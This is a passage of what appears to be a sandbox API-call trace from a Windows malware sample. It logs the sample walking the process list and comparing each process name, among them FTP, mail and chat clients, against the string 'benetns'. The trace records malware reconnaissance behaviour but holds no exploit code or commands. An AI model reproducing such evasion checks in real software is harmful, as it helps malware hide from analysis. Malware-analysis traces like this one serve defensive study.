th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0177.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.619] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35820d8 [0177.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x35820d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0177.619] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0177.619] StrStrIA (lpFirst="gainedshape.exe", lpSrch="benetns") returned 0x0 [0177.619] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0177.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.650] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595f88 [0177.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3595f88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0177.650] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0177.650] StrStrIA (lpFirst="opens-versions.exe", lpSrch="benetns") returned 0x0 [0177.650] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0177.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0177.651] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586408 [0177.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3586408, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0177.651] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0177.651] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="benetns") returned 0x0 [0177.652] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0177.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.653] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582228 [0177.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582228, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0177.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0177.653] StrStrIA (lpFirst="3dftp.exe", lpSrch="benetns") returned 0x0 [0177.653] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0177.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.654] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596228 [0177.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3596228, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0177.654] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0177.655] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="benetns") returned 0x0 [0177.655] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0177.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.656] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35821e0 [0177.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35821e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0177.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0177.656] StrStrIA (lpFirst="alftp.exe", lpSrch="benetns") returned 0x0 [0177.656] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0177.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.657] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35823a8 [0177.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35823a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0177.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0177.658] StrStrIA (lpFirst="barca.exe", lpSrch="benetns") returned 0x0 [0177.658] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0177.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.659] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35821f8 [0177.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35821f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0177.659] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0177.659] StrStrIA (lpFirst="bitkinex.exe", lpSrch="benetns") returned 0x0 [0177.659] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0177.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.661] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582180 [0177.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582180, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0177.661] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0177.661] StrStrIA (lpFirst="coreftp.exe", lpSrch="benetns") returned 0x0 [0177.661] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0177.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.662] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3586a20 [0177.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3586a20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0177.662] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0177.662] StrStrIA (lpFirst="far.exe", lpSrch="benetns") returned 0x0 [0177.662] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0177.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.664] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582108 [0177.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3582108, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0177.664] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0177.664] StrStrIA (lpFirst="filezilla.exe", lpSrch="benetns") returned 0x0 [0177.664] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0177.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.665] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582210 [0177.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3582210, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0177.665] StrStrIA (lpFirst="flashfxp.exe", lpSrch="benetns") returned 0x0 [0177.665] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0177.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.667] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582240 [0177.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3582240, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0177.667] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0177.667] StrStrIA (lpFirst="fling.exe", lpSrch="benetns") returned 0x0 [0177.667] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0177.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.668] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35960a8 [0177.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x35960a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0177.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0177.668] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="benetns") returned 0x0 [0177.668] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0177.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.670] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595ec8 [0177.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3595ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0177.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0177.670] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="benetns") returned 0x0 [0177.670] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0177.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.671] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35869b0 [0177.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35869b0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0177.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0177.671] StrStrIA (lpFirst="icq.exe", lpSrch="benetns") returned 0x0 [0177.671] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0177.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.673] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35822e8 [0177.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35822e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0177.673] StrStrIA (lpFirst="leechftp.exe", lpSrch="benetns") returned 0x0 [0177.673] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0177.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.675] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582318 [0177.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3582318, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0177.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0177.675] StrStrIA (lpFirst="ncftp.exe", lpSrch="benetns") returned 0x0 [0177.675] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0177.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.679] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582138 [0177.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3582138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0177.679] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0177.679] StrStrIA (lpFirst="notepad.exe", lpSrch="benetns") returned 0x0 [0177.679] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0177.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.680] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3582270 [0177.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3582270, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0177.681] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0177.681] StrStrIA (lpFirst="operamail.exe", lpSrch="benetns") returned 0x0 [0177.681] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0177.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.682] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35821b0 [0177.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x35821b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0177.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0177.682] StrStrIA (lpFirst="pidgin.exe", lpSrch="benetns") returned 0x0 [0177.682] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0177.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.684] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35822a0 [0177.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x35822a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0177.684] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0177.684] StrStrIA (lpFirst="scriptftp.exe", lpSrch="benetns") returned 0x0 [0177.684] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0177.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.788] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582258 [0177.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3582258, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0177.788] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0177.789] StrStrIA (lpFirst="skype.exe", lpSrch="benetns") returned 0x0 [0177.789] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, 